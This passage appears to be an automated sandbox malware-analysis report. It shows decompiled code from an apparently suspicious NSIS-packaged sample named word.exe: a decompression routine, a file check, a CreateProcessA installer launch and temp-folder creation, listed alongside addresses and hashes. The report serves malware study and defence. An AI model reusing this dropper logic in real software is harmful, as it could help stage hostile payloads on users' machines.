                                                          							goto L114;
                                                          						case 0x11:
                                                          							L71:
                                                          							__esi = _v92;
                                                          							_v136 = 0x12;
                                                          							goto L135;
                                                          						case 0x12:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v92;
                                                          								_v136 = 0x13;
                                                          								__esi = _v92 + 2;
                                                          								L135:
                                                          								_v88 = _t626;
                                                          								goto L136;
                                                          							}
                                                          							__eax = _v80;
                                                          							_v52 = _v52 & 0x00000000;
                                                          							__ecx = _v92;
                                                          							__eax = _v80 << 4;
                                                          							__eflags = __eax;
                                                          							__eax = _v92 + __eax + 4;
                                                          							goto L133;
                                                          						case 0x13:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								_t475 =  &_v92;
                                                          								 *_t475 = _v92 + 0x204;
                                                          								__eflags =  *_t475;
                                                          								_v52 = 0x10;
                                                          								_v68 = 8;
                                                          								L147:
                                                          								_v128 = 0x14;
                                                          								goto L148;
                                                          							}
                                                          							__eax = _v80;
                                                          							__ecx = _v92;
                                                          							__eax = _v80 << 4;
                                                          							_v52 = 8;
                                                          							__eax = _v92 + (_v80 << 4) + 0x104;
                                                          							L133:
                                                          							_v92 = __eax;
                                                          							_v68 = 3;
                                                          							goto L147;
                                                          						case 0x14:
                                                          							_v52 = _v52 + __ebx;
                                                          							__eax = _v132;
                                                          							goto L143;
                                                          						case 0x15:
                                                          							__eax = 0;
                                                          							__eflags = _v60 - 7;
                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          							__al = __al & 0x000000fd;
                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                          							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                          							goto L123;
                                                          						case 0x16:
                                                          							__eax = _v52;
                                                          							__eflags = __eax - 4;
                                                          							if(__eax >= 4) {
                                                          								_push(3);
                                                          								_pop(__eax);
                                                          							}
                                                          							__ecx = _v8;
                                                          							_v68 = 6;
                                                          							__eax = __eax << 7;
                                                          							_v128 = 0x19;
                                                          							_v92 = __eax;
                                                          							goto L148;
                                                          						case 0x17:
                                                          							L148:
                                                          							__eax = _v68;
                                                          							_v84 = 1;
                                                          							_v76 = _v68;
                                                          							goto L152;
                                                          						case 0x18:
                                                          							L149:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0x18;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t490 =  &_v116;
                                                          							 *_t490 = _v116 + 1;
                                                          							__eflags =  *_t490;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L151:
                                                          							_t493 =  &_v76;
                                                          							 *_t493 = _v76 - 1;
                                                          							__eflags =  *_t493;
                                                          							L152:
                                                          							__eflags = _v76;
                                                          							if(_v76 <= 0) {
                                                          								__ecx = _v68;
                                                          								__ebx = _v84;
                                                          								0 = 1;
                                                          								__eax = 1 << __cl;
                                                          								__ebx = _v84 - (1 << __cl);
                                                          								__eax = _v128;
                                                          								_v72 = __ebx;
                                                          								L143:
                                                          								_v140 = _t561;
                                                          								goto L3;
                                                          							}
                                                          							__eax = _v84;
                                                          							_v20 = _v20 >> 0xb;
                                                          							__edx = _v84 + _v84;
                                                          							__eax = _v92;
                                                          							__esi = __edx + __eax;
                                                          							_v88 = __esi;
                                                          							__ax =  *__esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                          							__eflags = _v16 - __ecx;
                                                          							if(_v16 >= __ecx) {
                                                          								_v20 = _v20 - __ecx;
                                                          								_v16 = _v16 - __ecx;
                                                          								__cx = __ax;
                                                          								__cx = __ax >> 5;
                                                          								__eax = __eax - __ecx;
                                                          								__edx = __edx + 1;
                                                          								__eflags = __edx;
                                                          								 *__esi = __ax;
                                                          								_v84 = __edx;
                                                          							} else {
                                                          								_v20 = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								_v84 = _v84 << 1;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L151;
                                                          							} else {
                                                          								goto L149;
                                                          							}
                                                          						case 0x19:
                                                          							__eflags = __ebx - 4;
                                                          							if(__ebx < 4) {
                                                          								_v48 = __ebx;
                                                          								L122:
                                                          								_t399 =  &_v48;
                                                          								 *_t399 = _v48 + 1;
                                                          								__eflags =  *_t399;
                                                          								L123:
                                                          								__eax = _v48;
                                                          								__eflags = __eax;
                                                          								if(__eax == 0) {
                                                          									_v52 = _v52 | 0xffffffff;
                                                          									goto L173;
                                                          								}
                                                          								__eflags = __eax - _v100;
                                                          								if(__eax > _v100) {
                                                          									goto L174;
                                                          								}
                                                          								_v52 = _v52 + 2;
                                                          								__eax = _v52;
                                                          								_t406 =  &_v100;
                                                          								 *_t406 = _v100 + _v52;
                                                          								__eflags =  *_t406;
                                                          								goto L126;
                                                          							}
                                                          							__ecx = __ebx;
                                                          							__eax = __ebx;
                                                          							__ecx = __ebx >> 1;
                                                          							__eax = __ebx & 0x00000001;
                                                          							__ecx = (__ebx >> 1) - 1;
                                                          							__al = __al | 0x00000002;
                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                          							__eflags = __ebx - 0xe;
                                                          							_v48 = __eax;
                                                          							if(__ebx >= 0xe) {
                                                          								__ebx = 0;
                                                          								_v76 = __ecx;
                                                          								L105:
                                                          								__eflags = _v76;
                                                          								if(_v76 <= 0) {
                                                          									__eax = __eax + __ebx;
                                                          									_v68 = 4;
                                                          									_v48 = __eax;
                                                          									__eax = _v8;
                                                          									__eax = _v8 + 0x644;
                                                          									__eflags = __eax;
                                                          									L111:
                                                          									__ebx = 0;
                                                          									_v92 = __eax;
                                                          									_v84 = 1;
                                                          									_v72 = 0;
                                                          									_v76 = 0;
                                                          									L115:
                                                          									__eax = _v68;
                                                          									__eflags = _v76 - _v68;
                                                          									if(_v76 >= _v68) {
                                                          										_t397 =  &_v48;
                                                          										 *_t397 = _v48 + __ebx;
                                                          										__eflags =  *_t397;
                                                          										goto L122;
                                                          									}
                                                          									__eax = _v84;
                                                          									_v20 = _v20 >> 0xb;
                                                          									__edi = _v84 + _v84;
                                                          									__eax = _v92;
                                                          									__esi = __edi + __eax;
                                                          									_v88 = __esi;
                                                          									__ax =  *__esi;
                                                          									__ecx = __ax & 0x0000ffff;
                                                          									__edx = (_v20 >> 0xb) * __ecx;
                                                          									__eflags = _v16 - __edx;
                                                          									if(_v16 >= __edx) {
                                                          										__ecx = 0;
                                                          										_v20 = _v20 - __edx;
                                                          										__ecx = 1;
                                                          										_v16 = _v16 - __edx;
                                                          										__ebx = 1;
                                                          										__ecx = _v76;
                                                          										__ebx = 1 << __cl;
                                                          										__ecx = 1 << __cl;
                                                          										__ebx = _v72;
                                                          										__ebx = _v72 | __ecx;
                                                          										__cx = __ax;
                                                          										__cx = __ax >> 5;
                                                          										__eax = __eax - __ecx;
                                                          										__edi = __edi + 1;
                                                          										__eflags = __edi;
                                                          										_v72 = __ebx;
                                                          										 *__esi = __ax;
                                                          										_v84 = __edi;
                                                          									} else {
                                                          										_v20 = __edx;
                                                          										0x800 = 0x800 - __ecx;
                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          										_v84 = _v84 << 1;
                                                          										 *__esi = __dx;
                                                          									}
                                                          									__eflags = _v20 - 0x1000000;
                                                          									if(_v20 >= 0x1000000) {
                                                          										L114:
                                                          										_t374 =  &_v76;
                                                          										 *_t374 = _v76 + 1;
                                                          										__eflags =  *_t374;
                                                          										goto L115;
                                                          									} else {
                                                          										goto L112;
                                                          									}
                                                          								}
                                                          								__ecx = _v16;
                                                          								__ebx = __ebx + __ebx;
                                                          								_v20 = _v20 >> 1;
                                                          								__eflags = _v16 - _v20;
                                                          								_v72 = __ebx;
                                                          								if(_v16 >= _v20) {
                                                          									__ecx = _v20;
                                                          									_v16 = _v16 - _v20;
                                                          									__ebx = __ebx | 0x00000001;
                                                          									__eflags = __ebx;
                                                          									_v72 = __ebx;
                                                          								}
                                                          								__eflags = _v20 - 0x1000000;
                                                          								if(_v20 >= 0x1000000) {
                                                          									L104:
                                                          									_t344 =  &_v76;
                                                          									 *_t344 = _v76 - 1;
                                                          									__eflags =  *_t344;
                                                          									goto L105;
                                                          								} else {
                                                          									goto L102;
                                                          								}
                                                          							}
                                                          							__edx = _v8;
                                                          							__eax = __eax - __ebx;
                                                          							_v68 = __ecx;
                                                          							__eax = _v8 + 0x55e + __eax * 2;
                                                          							goto L111;
                                                          						case 0x1a:
                                                          							L58:
                                                          							__eflags = _v104;
                                                          							if(_v104 == 0) {
                                                          								_v140 = 0x1a;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v108;
                                                          							__al = _v96;
                                                          							__edx = _v12;
                                                          							_v100 = _v100 + 1;
                                                          							_v108 = _v108 + 1;
                                                          							_v104 = _v104 - 1;
                                                          							 *_v108 = __al;
                                                          							__ecx = _v24;
                                                          							 *(_v12 + __ecx) = __al;
                                                          							__eax = __ecx + 1;
                                                          							__edx = 0;
                                                          							_t197 = __eax % _v120;
                                                          							__eax = __eax / _v120;
                                                          							__edx = _t197;
                                                          							goto L82;
                                                          						case 0x1b:
                                                          							L78:
                                                          							__eflags = _v104;
                                                          							if(_v104 == 0) {
                                                          								_v140 = 0x1b;
                                                          								goto L173;
                                                          							}
                                                          							__eax = _v24;
                                                          							__eax = _v24 - _v48;
                                                          							__eflags = __eax - _v120;
                                                          							if(__eax >= _v120) {
                                                          								__eax = __eax + _v120;
                                                          								__eflags = __eax;
                                                          							}
                                                          							__edx = _v12;
                                                          							__cl =  *(__edx + __eax);
                                                          							__eax = _v24;
                                                          							_v96 = __cl;
                                                          							 *(__edx + __eax) = __cl;
                                                          							__eax = __eax + 1;
                                                          							__edx = 0;
                                                          							_t280 = __eax % _v120;
                                                          							__eax = __eax / _v120;
                                                          							__edx = _t280;
                                                          							__eax = _v108;
                                                          							_v100 = _v100 + 1;
                                                          							_v108 = _v108 + 1;
                                                          							_t289 =  &_v104;
                                                          							 *_t289 = _v104 - 1;
                                                          							__eflags =  *_t289;
                                                          							 *_v108 = __cl;
                                                          							L82:
                                                          							_v24 = __edx;
                                                          							goto L83;
                                                          						case 0x1c:
                                                          							while(1) {
                                                          								L126:
                                                          								__eflags = _v104;
                                                          								if(_v104 == 0) {
                                                          									break;
                                                          								}
                                                          								__eax = _v24;
                                                          								__eax = _v24 - _v48;
                                                          								__eflags = __eax - _v120;
                                                          								if(__eax >= _v120) {
                                                          									__eax = __eax + _v120;
                                                          									__eflags = __eax;
                                                          								}
                                                          								__edx = _v12;
                                                          								__cl =  *(__edx + __eax);
                                                          								__eax = _v24;
                                                          								_v96 = __cl;
                                                          								 *(__edx + __eax) = __cl;
                                                          								__eax = __eax + 1;
                                                          								__edx = 0;
                                                          								_t420 = __eax % _v120;
                                                          								__eax = __eax / _v120;
                                                          								__edx = _t420;
                                                          								__eax = _v108;
                                                          								_v108 = _v108 + 1;
                                                          								_v104 = _v104 - 1;
                                                          								_v52 = _v52 - 1;
                                                          								__eflags = _v52;
                                                          								 *_v108 = __cl;
                                                          								_v24 = _t420;
                                                          								if(_v52 > 0) {
                                                          									continue;
                                                          								} else {
                                                          									L83:
                                                          									_v140 = 2;
                                                          									goto L3;
                                                          								}
                                                          							}
                                                          							_v140 = 0x1c;
                                                          							L173:
                                                          							_push(0x22);
                                                          							_pop(_t574);
                                                          							memcpy(_v148,  &_v140, _t574 << 2);
                                                          							return 0;
                                                          					}
                                                          				}
                                                          				L174:
                                                          				_t538 = _t537 | 0xffffffff;
                                                          				return _t538;
                                                          			}










































                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x00000000
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x0040676b
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00406268
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x00000000
                                                          0x004068b1
                                                          0x00406272
                                                          0x00406275
                                                          0x00406278
                                                          0x0040627b
                                                          0x0040627e
                                                          0x00406281
                                                          0x00406284
                                                          0x00406286
                                                          0x00406289
                                                          0x0040628c
                                                          0x0040628f

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tCPInfo
                                                          • API String ID: 0-2120998202
                                                          • Opcode ID: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
                                                          • Instruction ID: 41b63ac7315969e8c4cdeb39c952146f886d2b6e08649ca9387d619dcd40c967
                                                          • Opcode Fuzzy Hash: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
                                                          • Instruction Fuzzy Hash: A8817871D04229CFDF24CFA8C8447AEBBB0FB44305F25816AD856BB281D7785A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 627 4056c8-4056e3 call 405af4 call 40567b 632 4056e5-4056e7 627->632 633 4056e9-4056f6 call 405d03 627->633 634 40573b-40573d 632->634 637 405702-405704 633->637 638 4056f8-4056fc 633->638 640 40571a-405723 lstrlenA 637->640 638->632 639 4056fe-405700 638->639 639->632 639->637 641 405725-405739 call 4055e7 GetFileAttributesA 640->641 642 405706-40570d call 405d9c 640->642 641->634 647 405714-405715 call 40562e 642->647 648 40570f-405712 642->648 647->640 648->632 648->647
                                                          C-Code - Quality: 53%
                                                          			E004056C8(void* __eflags, intOrPtr _a4) {
                                                          				int _t11;
                                                          				signed char* _t12;
                                                          				long _t16;
                                                          				intOrPtr _t18;
                                                          				intOrPtr* _t21;
                                                          				void* _t22;
                                                          
                                                          				E00405AF4(0x421938, _a4);
                                                          				_t21 = E0040567B(0x421938);
                                                          				if(_t21 != 0) {
                                                          					E00405D03(_t21);
                                                          					if(( *0x423f30 & 0x00000080) == 0) {
                                                          						L5:
                                                          						_t22 = _t21 - 0x421938;
                                                          						while(1) {
                                                          							_t11 = lstrlenA(0x421938);
                                                          							_push(0x421938);
                                                          							if(_t11 <= _t22) {
                                                          								break;
                                                          							}
                                                          							_t12 = E00405D9C();
                                                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                          								E0040562E(0x421938);
                                                          								continue;
                                                          							} else {
                                                          								goto L1;
                                                          							}
                                                          						}
                                                          						E004055E7();
                                                          						_t16 = GetFileAttributesA(??); // executed
                                                          						return 0 | _t16 != 0xffffffff;
                                                          					}
                                                          					_t18 =  *_t21;
                                                          					if(_t18 == 0 || _t18 == 0x5c) {
                                                          						goto L1;
                                                          					} else {
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          				L1:
                                                          				return 0;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                            • Part of subcall function 0040567B: CharNextA.USER32(:T@), ref: 00405689
                                                            • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
                                                            • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D
                                                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0,00000000), ref: 0040571B
                                                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0,00000000), ref: 0040572B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\$C:\Users\user\AppData\Roaming\word.exe
                                                          • API String ID: 3248276644-3352972398
                                                          • Opcode ID: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
                                                          • Instruction ID: c9a5ad2ab4ff501f0e3d3fb61e1c810f238de096eca0db9d00b0265de3cbf42b
                                                          • Opcode Fuzzy Hash: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
                                                          • Instruction Fuzzy Hash: 81F04C25116D5152C72233392C09AAF1755CE9632CB48093BF865B22E2DB3D8803ED7E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 650 405361-40538e CreateProcessA 651 405390-405399 CloseHandle 650->651 652 40539c-40539d 650->652 651->652
                                                          C-Code - Quality: 100%
                                                          			E00405361(CHAR* _a4) {
                                                          				struct _PROCESS_INFORMATION _v20;
                                                          				int _t7;
                                                          
                                                          				0x422538->cb = 0x44;
                                                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422538,  &_v20); // executed
                                                          				if(_t7 != 0) {
                                                          					CloseHandle(_v20.hThread);
                                                          					return _v20.hProcess;
                                                          				}
                                                          				return _t7;
                                                          			}

                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
                                                          • CloseHandle.KERNEL32(?), ref: 00405393
                                                          Strings
                                                          • Error launching installer, xrefs: 00405374
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405361
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                          • API String ID: 3712363035-3894416041
                                                          • Opcode ID: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
                                                          • Instruction ID: 4b3b5e29b82f538c1f6189d2f0b4571506454f650d891e3160212e6729b48b77
                                                          • Opcode Fuzzy Hash: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
                                                          • Instruction Fuzzy Hash: 9AE012B4A00209BFDB00EF64ED49E6FBBBCFB10344F808571B914F2151D7B8E9508A69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E004032C6(void* __eflags) {
                                                          				void* _t2;
                                                          				void* _t5;
                                                          				CHAR* _t6;
                                                          
                                                          				_t6 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                          				E00405D03(_t6);
                                                          				_t2 = E00405654(_t6);
                                                          				if(_t2 != 0) {
                                                          					E004055E7(_t6);
                                                          					CreateDirectoryA(_t6, 0); // executed
                                                          					_t5 = E004057FA("1033", _t6); // executed
                                                          					return _t5;
                                                          				} else {
                                                          					return _t2;
